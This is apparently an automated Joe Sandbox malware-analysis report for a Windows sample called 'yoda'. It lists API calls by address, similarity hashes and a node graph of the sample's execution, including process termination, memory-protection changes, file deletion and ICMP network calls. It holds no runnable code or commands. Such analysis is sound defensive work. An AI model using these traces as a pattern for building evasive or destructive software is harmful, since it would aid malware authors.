                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                • String ID: !N~
                                                                                                                                                                                                                                                                • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                • String ID: Error launching installer
                                                                                                                                                                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                  • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 190613189-0
                                                                                                                                                                                                                                                                • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:3.4%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                Signature Coverage:3.7%
                                                                                                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                                                                                                Total number of Limit Nodes:58
102907->103120 102909->102814 103175 aa89b6 102910->103175 102912 aa9ff8 102912->102814 102914 aa0fe1 102913->102914 102915 aa100f WSAStartup 102914->102915 103318 a2c98d 39 API calls 102914->103318 102916 aa1054 102915->102916 102937 aa1023 ISource 102915->102937 103305 a3c1f6 102916->103305 102919 aa0ffc 102919->102915 103319 a2c98d 39 API calls 102919->103319 102921 a28ec0 52 API calls 102923 aa1069 102921->102923 103310 a3f9d4 WideCharToMultiByte 102923->103310 102924 aa100b 102924->102915 102926 aa1075 inet_addr gethostbyname 102927 aa1093 IcmpCreateFile 102926->102927 102926->102937 102928 aa10d3 102927->102928 102927->102937 102929 a4017b 8 API calls 102928->102929 102930 aa10ec 102929->102930 103320 a2423c 102930->103320 102933 aa112b IcmpSendEcho 102936 aa114c 102933->102936 102934 aa1102 IcmpSendEcho 102934->102936 102935 aa1212 IcmpCloseHandle WSACleanup 102935->102937 102936->102935 102937->102814 102939 a28ec0 52 API calls 102938->102939 102940 a96662 102939->102940 103325 a8dc54 102940->103325 102942 a9666a 102943 a9666e GetLastError 102942->102943 102944 a96683 102942->102944 102943->102944 102944->102814 102946 a4017b 8 API calls 102945->102946 102947 a9f95b 102946->102947 102948 a2423c 8 API calls 102947->102948 102949 a9f965 102948->102949 102950 a28ec0 52 API calls 102949->102950 102951 a9f97c GetEnvironmentVariableW 102950->102951 103473 a9160f 8 API calls 102951->103473 102953 a9f999 ISource 102953->102814 102955 aa89b6 119 API calls 102954->102955 102956 aaa00c 102955->102956 102956->102814 102958 aaaa08 102957->102958 102964 aaa9c8 102957->102964 102962 aaaa26 102958->102962 103474 a2c98d 39 API calls 102958->103474 102961 aaaa8e 102963 a90372 58 API calls 102961->102963 102962->102961 102962->102964 103475 a2c98d 39 API calls 102962->103475 102963->102964 102964->102814 102966 a28ec0 52 API calls 102965->102966 102967 aaad63 102966->102967 103476 a8dd87 CreateToolhelp32Snapshot Process32FirstW 102967->103476 102969 aaad72 102969->102814 
102971 a28ec0 52 API calls 102970->102971 102972 a3ac68 102971->102972 102973 a3bc58 8 API calls 102972->102973 102974 a3ac7f 102973->102974 102984 a3b09b _wcslen 102974->102984 103509 a2c98d 39 API calls 102974->103509 102976 a44d98 _strftime 40 API calls 102976->102984 102978 a26c03 8 API calls 102978->102984 102979 a3bbbe 43 API calls 102979->102984 102982 a3b1fb 102982->102814 102983 a2c98d 39 API calls 102983->102984 102984->102976 102984->102978 102984->102979 102984->102982 102984->102983 102985 a28ec0 52 API calls 102984->102985 102986 a28577 8 API calls 102984->102986 103495 a2396b 102984->103495 103505 a23907 102984->103505 103510 a27ad5 102984->103510 103515 a2ad40 8 API calls __fread_nolock 102984->103515 103516 a27b1a 8 API calls 102984->103516 102985->102984 102986->102984 102990 aa7b38 102989->102990 102991 aa7b52 102989->102991 103554 a93fe1 81 API calls __wsopen_s 102990->103554 102993 aa60e6 8 API calls 102991->102993 102994 aa7b5d 102993->102994 102995 a30340 206 API calls 102994->102995 102996 aa7bc1 102995->102996 102997 aa7c5c 102996->102997 103000 aa7c03 102996->103000 103020 aa7b4a 102996->103020 102998 aa7c62 102997->102998 102999 aa7cb0 102997->102999 103555 a91ad8 8 API calls 102998->103555 103001 a28ec0 52 API calls 102999->103001 102999->103020 103005 a9148b 8 API calls 103000->103005 103003 aa7cc2 103001->103003 103006 a2c2c9 8 API calls 103003->103006 103004 aa7c85 103556 a2bd07 8 API calls 103004->103556 103008 aa7c3b 103005->103008 103009 aa7ce6 CharUpperBuffW 103006->103009 103010 a32b20 206 API calls 103008->103010 103011 aa7d00 103009->103011 103010->103020 103012 aa7d53 103011->103012 103013 aa7d07 103011->103013 103014 a28ec0 52 API calls 103012->103014 103016 a9148b 8 API calls 103013->103016 103015 aa7d5b 103014->103015 103557 a3aa65 9 API calls 103015->103557 103018 aa7d35 103016->103018 103019 a32b20 206 API calls 103018->103019 103019->103020 103020->102781 103021 aa7d65 103021->103020 103022 a28ec0 52 API calls 
103021->103022 103023 aa7d80 103022->103023 103558 a2bd07 8 API calls 103023->103558 103025->102818 103026->102779 103028 a2b338 _wcslen 103027->103028 103029 a4017b 8 API calls 103028->103029 103030 a2b360 __fread_nolock 103029->103030 103031 a4014b 8 API calls 103030->103031 103032 a2b376 103031->103032 103032->102793 103033->102788 103034->102792 103035->102806 103036->102806 103037->102814 103038->102814 103039->102814 103040->102812 103041->102814 103042->102890 103043->102894 103044->102892 103045->102889 103080 a902aa 103046->103080 103049 a9040b 103052 a90471 103049->103052 103055 a9041b 103049->103055 103050 a903f3 103096 a905e9 56 API calls __fread_nolock 103050->103096 103053 a904a1 103052->103053 103054 a90507 103052->103054 103071 a90399 __fread_nolock 103052->103071 103056 a904d1 103053->103056 103057 a904a6 103053->103057 103058 a905b0 103054->103058 103059 a90510 103054->103059 103060 a90453 103055->103060 103097 a92855 10 API calls 103055->103097 103056->103071 103101 a2ca5b 39 API calls 103056->103101 103057->103071 103100 a2ca5b 39 API calls 103057->103100 103058->103071 103105 a2c63f 39 API calls 103058->103105 103061 a9058d 103059->103061 103062 a90515 103059->103062 103087 a91844 103060->103087 103061->103071 103104 a2c63f 39 API calls 103061->103104 103066 a9051b 103062->103066 103067 a90554 103062->103067 103066->103071 103102 a2c63f 39 API calls 103066->103102 103067->103071 103103 a2c63f 39 API calls 103067->103103 103071->102903 103074 a90427 103098 a92855 10 API calls 103074->103098 103076 a9043e __fread_nolock 103099 a92855 10 API calls 103076->103099 103078->102897 103079->102901 103081 a902f7 103080->103081 103085 a902bb 103080->103085 103116 a2c98d 39 API calls 103081->103116 103083 a902f5 103083->103049 103083->103050 103083->103071 103084 a28ec0 52 API calls 103084->103085 103085->103083 103085->103084 103106 a44d98 103085->103106 103088 a9184f 103087->103088 103089 a4014b 8 API calls 103088->103089 103090 a91856 103089->103090 
103091 a91883 103090->103091 103092 a91862 103090->103092 103093 a4017b 8 API calls 103091->103093 103094 a4017b 8 API calls 103092->103094 103095 a9186b ___scrt_fastfail 103093->103095 103094->103095 103095->103071 103096->103071 103097->103074 103098->103076 103099->103060 103100->103071 103101->103071 103102->103071 103103->103071 103104->103071 103105->103071 103107 a44da6 103106->103107 103108 a44e1b 103106->103108 103115 a44dcb 103107->103115 103117 a4f649 20 API calls __dosmaperr 103107->103117 103119 a44e2d 40 API calls 4 library calls 103108->103119 103111 a44e28 103111->103085 103112 a44db2 103118 a52b5c 26 API calls pre_c_initialization 103112->103118 103114 a44dbd 103114->103085 103115->103085 103116->103083 103117->103112 103118->103114 103119->103111 103121 a918b6 103120->103121 103122 a4014b 8 API calls 103121->103122 103123 a918bd 103122->103123 103126 a8fcb5 103123->103126 103125 a918f7 103125->102909 103144 a2c2c9 103126->103144 103128 a8fcc8 CharLowerBuffW 103134 a8fcdb 103128->103134 103129 a2655e 8 API calls 103129->103134 103130 a8fd19 103131 a8fd2b 103130->103131 103165 a2655e 103130->103165 103133 a4017b 8 API calls 103131->103133 103138 a8fd59 103133->103138 103134->103129 103134->103130 103143 a8fce5 ___scrt_fastfail 103134->103143 103137 a8fdb8 103140 a4014b 8 API calls 103137->103140 103137->103143 103139 a8fd7b 103138->103139 103168 a8fbed 8 API calls 103138->103168 103150 a8fe0c 103139->103150 103141 a8fdd2 103140->103141 103142 a4017b 8 API calls 103141->103142 103142->103143 103143->103125 103145 a2c2d9 __fread_nolock 103144->103145 103146 a2c2dc 103144->103146 103145->103128 103147 a4014b 8 API calls 103146->103147 103148 a2c2e7 103147->103148 103149 a4017b 8 API calls 103148->103149 103149->103145 103169 a2bf73 103150->103169 103153 a2bf73 8 API calls 103154 a8fe47 103153->103154 103155 a2bf73 8 API calls 103154->103155 103163 a8fe50 103155->103163 103156 a28577 8 API calls 103156->103163 103157 a90114 103157->103137 103158 a2ad40 
8 API calls 103158->103163 103159 a466f8 GetStringTypeW 103159->103163 103161 a46641 39 API calls 103161->103163 103162 a8fe0c 40 API calls 103162->103163 103163->103156 103163->103157 103163->103158 103163->103159 103163->103161 103163->103162 103164 a2bed9 8 API calls 103163->103164 103174 a46722 GetStringTypeW _strftime 103163->103174 103164->103163 103166 a2c2c9 8 API calls 103165->103166 103167 a26569 103166->103167 103167->103131 103168->103138 103170 a4017b 8 API calls 103169->103170 103171 a2bf88 103170->103171 103172 a4014b 8 API calls 103171->103172 103173 a2bf96 103172->103173 103173->103153 103174->103163 103176 a28ec0 52 API calls 103175->103176 103177 aa89ed 103176->103177 103199 aa8a32 ISource 103177->103199 103213 aa9730 103177->103213 103179 aa8cde 103180 aa8eac 103179->103180 103184 aa8cec 103179->103184 103263 aa9941 59 API calls 103180->103263 103183 aa8ebb 103183->103184 103185 aa8ec7 103183->103185 103226 aa88e3 103184->103226 103185->103199 103186 a28ec0 52 API calls 103204 aa8aa6 103186->103204 103191 aa8d25 103240 a3ffe0 103191->103240 103194 aa8d5f 103248 a27e12 103194->103248 103195 aa8d45 103247 a93fe1 81 API calls __wsopen_s 103195->103247 103198 aa8d50 GetCurrentProcess TerminateProcess 103198->103194 103199->102912 103204->103179 103204->103186 103204->103199 103245 a84ad3 8 API calls __fread_nolock 103204->103245 103246 aa8f7a 41 API calls _strftime 103204->103246 103205 aa8f22 103205->103199 103207 aa8f36 FreeLibrary 103205->103207 103206 aa8d9e 103260 aa95d8 74 API calls 103206->103260 103207->103199 103212 aa8daf 103212->103205 103261 a31ca0 8 API calls 103212->103261 103262 a2b4c8 8 API calls 103212->103262 103264 aa95d8 74 API calls 103212->103264 103214 a2c2c9 8 API calls 103213->103214 103215 aa974b CharLowerBuffW 103214->103215 103265 a89805 103215->103265 103219 a2bf73 8 API calls 103220 aa9787 103219->103220 103272 a2acc0 103220->103272 103222 aa979b 103284 a2adf4 103222->103284 103224 aa98bb _wcslen 103224->103204 103225 
aa97a5 _wcslen 103225->103224 103288 aa8f7a 41 API calls _strftime 103225->103288 103227 aa88fe 103226->103227 103228 aa8949 103226->103228 103229 a4017b 8 API calls 103227->103229 103232 aa9af3 103228->103232 103230 aa8920 103229->103230 103230->103228 103231 a4014b 8 API calls 103230->103231 103231->103230 103233 aa9d08 ISource 103232->103233 103238 aa9b17 _strcat _wcslen ___std_exception_copy 103232->103238 103233->103191 103234 a2c98d 39 API calls 103234->103238 103235 a2c63f 39 API calls 103235->103238 103236 a2ca5b 39 API calls 103236->103238 103237 a28ec0 52 API calls 103237->103238 103238->103233 103238->103234 103238->103235 103238->103236 103238->103237 103292 a8f8c5 10 API calls _wcslen 103238->103292 103241 a3fff5 103240->103241 103242 a4008d NtProtectVirtualMemory 103241->103242 103243 a4005b 103241->103243 103244 a4007b CloseHandle 103241->103244 103242->103243 103243->103194 103243->103195 103244->103243 103245->103204 103246->103204 103247->103198 103249 a27e1a 103248->103249 103250 a4014b 8 API calls 103249->103250 103251 a27e28 103250->103251 103293 a28445 103251->103293 103254 a28470 103296 a2c760 103254->103296 103256 a28480 103257 a4017b 8 API calls 103256->103257 103258 a2851c 103256->103258 103257->103258 103258->103212 103259 a31ca0 8 API calls 103258->103259 103259->103206 103260->103212 103261->103212 103262->103212 103263->103183 103264->103212 103266 a89825 _wcslen 103265->103266 103267 a89914 103266->103267 103269 a89919 103266->103269 103270 a8985a 103266->103270 103267->103219 103267->103225 103269->103267 103290 a3e36b 41 API calls 103269->103290 103270->103267 103289 a3e36b 41 API calls 103270->103289 103274 a2ace1 103272->103274 103283 a2accf 103272->103283 103273 a2c2c9 8 API calls 103275 a705a3 __fread_nolock 103273->103275 103276 a70557 103274->103276 103277 a2ad07 103274->103277 103274->103283 103278 a4014b 8 API calls 103276->103278 103291 a288e8 8 API calls 103277->103291 103281 a70561 103278->103281 103280 a2acda 
__fread_nolock 103280->103222 103282 a4017b 8 API calls 103281->103282 103282->103283 103283->103273 103283->103280 103285 a2ae02 103284->103285 103287 a2ae0b __fread_nolock 103284->103287 103286 a2c2c9 8 API calls 103285->103286 103285->103287 103286->103287 103287->103225 103288->103224 103289->103270 103290->103269 103291->103280 103292->103238 103294 a4014b 8 API calls 103293->103294 103295 a27e30 103294->103295 103295->103254 103297 a2c76b 103296->103297 103298 a71285 103297->103298 103303 a2c773 ISource 103297->103303 103299 a4014b 8 API calls 103298->103299 103301 a71291 103299->103301 103300 a2c77a 103300->103256 103303->103300 103304 a2c7e0 8 API calls ISource 103303->103304 103304->103303 103306 a4017b 8 API calls 103305->103306 103307 a3c209 103306->103307 103308 a4014b 8 API calls 103307->103308 103309 a3c215 103308->103309 103309->102921 103311 a3fa35 103310->103311 103312 a3f9fe 103310->103312 103324 a3fe8a 8 API calls 103311->103324 103313 a4017b 8 API calls 103312->103313 103315 a3fa05 WideCharToMultiByte 103313->103315 103323 a3fa3e 8 API calls __fread_nolock 103315->103323 103317 a3fa29 103317->102926 103318->102919 103319->102924 103321 a4014b 8 API calls 103320->103321 103322 a2424e 103321->103322 103322->102933 103322->102934 103323->103317 103324->103317 103326 a2bf73 8 API calls 103325->103326 103327 a8dc73 103326->103327 103328 a2bf73 8 API calls 103327->103328 103329 a8dc7c 103328->103329 103330 a2bf73 8 API calls 103329->103330 103331 a8dc85 103330->103331 103349 a25851 103331->103349 103336 a8dcab 103361 a2568e 103336->103361 103337 a26b7c 8 API calls 103337->103336 103339 a8dcbf FindFirstFileW 103340 a8dd4b FindClose 103339->103340 103345 a8dcde 103339->103345 103344 a8dd56 103340->103344 103341 a8dd26 FindNextFileW 103341->103345 103342 a2bed9 8 API calls 103342->103345 103344->102942 103345->103340 103345->103341 103345->103342 103403 a27bb5 103345->103403 103412 a26b7c 103345->103412 103348 a8dd42 FindClose 103348->103344 103421 
a622d0 103349->103421 103352 a25898 103439 a2bd57 103352->103439 103353 a2587d 103427 a28577 103353->103427 103356 a25889 103423 a255dc 103356->103423 103359 a8eab0 GetFileAttributesW 103360 a8dc99 103359->103360 103360->103336 103360->103337 103362 a2bf73 8 API calls 103361->103362 103363 a256a4 103362->103363 103364 a2bf73 8 API calls 103363->103364 103365 a256ac 103364->103365 103366 a2bf73 8 API calls 103365->103366 103367 a256b4 103366->103367 103368 a2bf73 8 API calls 103367->103368 103369 a256bc 103368->103369 103370 a256f0 103369->103370 103371 a64da1 103369->103371 103373 a2acc0 8 API calls 103370->103373 103372 a2bed9 8 API calls 103371->103372 103375 a64daa 103372->103375 103374 a256fe 103373->103374 103376 a2adf4 8 API calls 103374->103376 103377 a2bd57 8 API calls 103375->103377 103378 a25708 103376->103378 103379 a25733 103377->103379 103378->103379 103380 a2acc0 8 API calls 103378->103380 103381 a25754 103379->103381 103395 a25778 103379->103395 103398 a64dcc 103379->103398 103383 a25729 103380->103383 103387 a2655e 8 API calls 103381->103387 103381->103395 103382 a2acc0 8 API calls 103384 a25789 103382->103384 103385 a2adf4 8 API calls 103383->103385 103386 a2579f 103384->103386 103391 a2bed9 8 API calls 103384->103391 103385->103379 103390 a257b3 103386->103390 103393 a2bed9 8 API calls 103386->103393 103388 a25761 103387->103388 103392 a2acc0 8 API calls 103388->103392 103388->103395 103389 a28577 8 API calls 103400 a64e8c 103389->103400 103394 a2bed9 8 API calls 103390->103394 103396 a257be 103390->103396 103391->103386 103392->103395 103393->103390 103394->103396 103395->103382 103397 a2bed9 8 API calls 103396->103397 103401 a257c9 103396->103401 103397->103401 103398->103389 103399 a2655e 8 API calls 103399->103400 103400->103395 103400->103399 103446 a2ad40 8 API calls __fread_nolock 103400->103446 103401->103339 103404 a27bc7 103403->103404 103405 a6641d 103403->103405 103447 a27bd8 103404->103447 103457 a813c8 8 API calls __fread_nolock 
103405->103457 103408 a27bd3 103408->103345 103409 a66427 103410 a66433 103409->103410 103411 a2bed9 8 API calls 103409->103411 103411->103410 103413 a26b93 103412->103413 103414 a657fe 103412->103414 103463 a26ba4 103413->103463 103416 a4014b 8 API calls 103414->103416 103418 a65808 _wcslen 103416->103418 103417 a26b9e DeleteFileW 103417->103341 103417->103348 103419 a4017b 8 API calls 103418->103419 103420 a65841 __fread_nolock 103419->103420 103422 a2585e GetFullPathNameW 103421->103422 103422->103352 103422->103353 103424 a255ea 103423->103424 103425 a2adf4 8 API calls 103424->103425 103426 a255fe 103425->103426 103426->103359 103428 a28587 _wcslen 103427->103428 103429 a66610 103427->103429 103432 a285c2 103428->103432 103433 a2859d 103428->103433 103430 a2adf4 8 API calls 103429->103430 103431 a66619 103430->103431 103431->103431 103434 a4014b 8 API calls 103432->103434 103445 a288e8 8 API calls 103433->103445 103436 a285ce 103434->103436 103438 a4017b 8 API calls 103436->103438 103437 a285a5 __fread_nolock 103437->103356 103438->103437 103440 a2bd71 103439->103440 103444 a2bd64 103439->103444 103441 a4014b 8 API calls 103440->103441 103442 a2bd7b 103441->103442 103443 a4017b 8 API calls 103442->103443 103443->103444 103444->103356 103445->103437 103446->103400 103448 a27c1b __fread_nolock 103447->103448 103449 a27be7 103447->103449 103448->103408 103449->103448 103450 a6644e 103449->103450 103451 a27c0e 103449->103451 103452 a4014b 8 API calls 103450->103452 103458 a27d74 103451->103458 103454 a6645d 103452->103454 103455 a4017b 8 API calls 103454->103455 103456 a66491 __fread_nolock 103455->103456 103457->103409 103459 a27d8a 103458->103459 103462 a27d85 __fread_nolock 103458->103462 103460 a4017b 8 API calls 103459->103460 103461 a66528 103459->103461 103460->103462 103461->103461 103462->103448 103464 a26bb4 _wcslen 103463->103464 103465 a26bc7 103464->103465 103466 a65860 103464->103466 103467 a27d74 8 API calls 103465->103467 103468 a4014b 8 API calls 
